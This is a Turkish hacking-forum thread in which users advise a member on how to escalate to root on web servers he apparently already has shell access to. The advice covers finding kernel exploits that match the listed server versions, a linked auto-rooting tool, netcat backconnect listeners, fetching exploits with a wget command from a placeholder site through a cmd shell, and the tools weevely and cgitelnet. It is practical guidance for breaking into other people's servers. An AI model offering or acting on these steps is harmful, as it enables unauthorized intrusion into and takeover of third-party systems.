Server root işlemi (1 Viewer)

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Credits
0
Rating - 0%
Server rootlama hakkında
-Gereken programların isimleri
-indirme linkleri
-nereye kurulacağı
-var ise elinizde ki root exploit arşivini
-ve root işleminin anlatımını yapabilirmisiniz?

The_DeMoN

Dost
Credits
5,000
Rating - 0%
Dostum sen kısaca 1 saatte senelerin tecrübesini istiyorsun.

Program felan yok bu server rootlamada.
Servere uygun exploit eğer varsa root olursun. yeni serverlerin exploiti priv8 olarak ulaşabilirsin. 5000 10000 dolara yani.

üstad TheWayEnd zaten nasıl rootlanır göstermiş

Ayrıca Darkfeyz arkadaşın kodlayıp editlediği auto root backconnect programını denemelisin. 2014e kadar olan serverlarda işe yarıyor diye biliyorum

http://www.spyhackerz.com/forum/threads/linux-otomatik-server-rooter-2001-2015.1492/

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Credits
0
Rating - 0%
Dostum sen kısaca 1 saatte senelerin tecrübesini istiyorsun.

Program felan yok bu server rootlamada.

net cat yok mu ? phayton yok mu telnet yok mu ?
Benım derdim şu server rootlamaya hazırlık yani;
portu açıcan netcatı wındows/system32 atıcan çalıştıracan açtığın portu dınlemeye alıcan backconnet olacan sonra root exploiti temp klasorune yukluyecen. ardından komutla root olucan bunları bılıyoruz
serverın exploiti nasıl aranır nerelerde aranır komut verırken hangı komutu nne işe yaradıgını ne bılecen ayrıca komut hata verırse napacan kodu yazdın dıyelım ıngılızce bısey yazacak orda ne dedıgını falan nasıl anlıyacaz bunlarn pesındeyım

The_DeMoN

Dost
Credits
5,000
Rating - 0%
Dediğim gibi dostum sadece servere uygun exploiti bulacaksın. Tekrar dediğim gibi 2014e kadar olanlar exploit edilebiliyor. sana verdiğim otorooter bunların hepsini karşılıyor. bak zaten biliyormuşsun.

Komutun hata vermesi demek exploitin uyumlu olmadığındandır. Veya kendin exploit derliceksin. Sen bi server bul ilk önce, sonra çıkan hatayı buraya yazda bakalım hep beraber.

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Credits
0
Rating - 0%
Dediğim gibi dostum sadece servere uygun exploiti bulacaksın. Tekrar dediğim gibi 2014e kadar olanlar exploit edilebiliyor. sana verdiğim otorooter bunların hepsini karşılıyor. bak zaten biliyormuşsun.

Komutun hata vermesi demek exploitin uyumlu olmadığındandır. Veya kendin exploit derliceksin. Sen bi server bul ilk önce, sonra çıkan hatayı buraya yazda bakalım hep beraber.
server var 2-3 tane ama açık portum yok ve exploit arşivim yok 1-2 kere gösterebilcek birisi olsa iyi olurdu yada seslı anlatım varmı bildiğin

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Credits
0
Rating - 0%
Server versiyonu ne? eğer kali linux varsa weevely ile de backconnect olabiliyosun
1- Linux hm6128 3.14.58-grsec-1.lw5.x86_64
2- Linux 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64
3- Windows NT WIN-7IRFBFD4K02 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) i586
IUSR

Credits
0
Rating - 0%
1- Linux hm6128 3.14.58-grsec-1.lw5.x86_64
2- Linux 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64
3- Windows NT WIN-7IRFBFD4K02 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) i586
IUSR

3. cüsü windows server kardeşim onun rootlama işlemi değişik

The_DeMoN

Dost
Credits
5,000
Rating - 0%

Valla Kör Sultan bile anlardı değilmi? (şimdi dicek o sağır sultan. ben kör ettim onu). Şimdi backconnect ol, kullanıcı oluştur, gruba sok vs gibi işlemler var. Ama iyi bilmediğim ve sürekli linux serverlarla uğraştığım için ve sorulan sorulara tam yanıt veremeyeceğim için sustum. Atalarımız ne demiş? Bükemediğin eli öpeceksin.

2015 e kadar gülüm

Doğrudur.

Ayrıca Windows da root olduğunda Uzaktan yönetimlede bağlanılınıyor değil mi? Bilgisizliğimi af buyur.

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Credits
0
Rating - 0%
Sen darkfeyz olmasın galiba vps veya vds alsak port sorunu çözülür ve root yapmaya engel bi durum kalmaz değil mi

Credits
0
Rating - 0%
Sen darkfeyz olmasın galiba vps veya vds alsak port sorunu çözülür ve root yapmaya engel bi durum kalmaz değil mi

serveri rootlamak için illa backconnect olmayada gerek yokki cmd sheller var backconnect de vereceğiniz komutları yani örneğin wget site.com/eklpoitiniz i shell dedee uygulayıp root olabilirsiniz bir iki serverda denemiştim işe yarıyordu ama her server yermi bunu bilemem

Credits
460
Rating - 0%
Hocam sana tavsiyem kali linux kur. Zaten birsey yapmasan 2 dk ekrana baksan bi yere root oluyorsun :D Bu arada @demonline kardesim bak guzel oneri yapmis netcat yerine weevely kullanabilirsin cok rahat kullanimi ve sana priv ayricaligi taniyor. Ben bu sekilde backconnect yapiyorum daha eglenceli ve kodlamalarla yaptigin icin isin en can alici eglendirici yeri orasi. Illa uygun exploit bulmana gerek yok kardesim. Bypass ustasi cgitelnet var agir yardirabilirsin sadece mass yapamazsin hepsi bu ancak teker teker ameliyat ettigin icin siteleri bu senin gelisimin icin iyi olacaktir. cgitelnetle neler yapilabilecegini youtube da milyon video var izle ogren.

Users who are viewing this thread